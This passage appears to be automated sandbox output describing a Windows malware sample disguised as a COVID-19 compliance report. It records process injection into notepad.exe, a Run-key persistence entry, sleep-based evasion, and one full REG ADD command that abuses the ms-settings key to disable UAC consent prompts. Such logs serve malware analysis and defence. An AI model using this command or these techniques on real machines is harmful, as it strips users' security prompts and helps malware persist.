Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\notepad.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: C:\Windows\SysWOW64\notepad.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A4A22C push 00406568h; ret | 0_3_02A4A250
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A45210 push 00406568h; ret | 0_3_02A452B4
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A3DA5C push 00406568h; ret | 0_3_02A3DA80
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A55B14 push 00405CF5h; ret | 0_3_02A55B19
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A5786C push ecx; mov dword ptr [esp], eax | 0_3_02A5786D
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A5618C push 00406568h; ret | 0_3_02A5638C
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A49994 push 00405CF5h; ret | 0_3_02A499DD
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A3D1C4 push 00405CF5h; ret | 0_3_02A3D20D
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A45164 push 00406568h; ret | 0_3_02A452B4
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A46794 push ecx; mov dword ptr [esp], eax | 0_3_02A46795
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A4B730 push ecx; mov dword ptr [esp], eax | 0_3_02A4B731
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A49F1C push 00406258h; ret | 0_3_02A49F40
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A3EF60 push ecx; mov dword ptr [esp], eax | 0_3_02A3EF61
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A3D74C push 00406258h; ret | 0_3_02A3D770
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A3D4A4 push 00405FB0h; ret | 0_3_02A3D4C8
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A49CAC push 00405FE8h; ret | 0_3_02A49CD0
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A3D4DC push 00405FE8h; ret | 0_3_02A3D500
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A49C74 push 00405FB0h; ret | 0_3_02A49C98
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Code function: 0_3_02A36594 push eax; ret | 0_3_02A365D0
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_504878E8 push ecx; mov dword ptr [esp], eax | 6_2_504878E9
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_50486192 push 504861C0h; ret | 6_2_504861B8
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_50486194 push 504861C0h; ret | 6_2_504861B8
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_50492A54 push 50492AFFh; ret | 6_2_50492AF7
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_504832C8 push eax; ret | 6_2_50483304
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_50486364 push eax; ret | 6_2_50486368
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_50492B04 push 50492B94h; ret | 6_2_50492B8C
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_5048C320 push 5048C49Ch; ret | 6_2_5048C494
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_504863CC push 504864C8h; ret | 6_2_504864C0
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_504863AC push eax; iretd | 6_2_504863C8
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_504863A4 push eax; retf | 6_2_504863A8
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_5048F44C push 5048F4C2h; ret | 6_2_5048F4BA
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Xbuh
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 14_3_023F0658 rdtsc | 14_3_023F0658
Source: C:\Windows\SysWOW64\notepad.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\notepad.exe TID: 352 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 5540 | Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 5540 | Thread sleep time: -36000s >= -30000s
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, | 6_2_5048518C
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: reg.exe, 0000000C.00000002.769365047.0000000003310000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 14_3_023F0658 rdtsc | 14_3_023F0658

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 50480000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 140000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 150000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 160000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 1F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 200000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 210000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 220000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 230000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 240000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 250000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 260000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 270000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 280000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 290000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 2A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 23D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 23F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 2710000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 2720000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 2780000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 2790000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 27A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27B0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27E0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 27F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2800000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2810000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2820000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2830000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2840000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2850000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2860000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2870000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2880000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 2890000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 28A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4150000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4160000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4170000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 4190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41B0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41C0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 41E0000 protect: page execute and read and write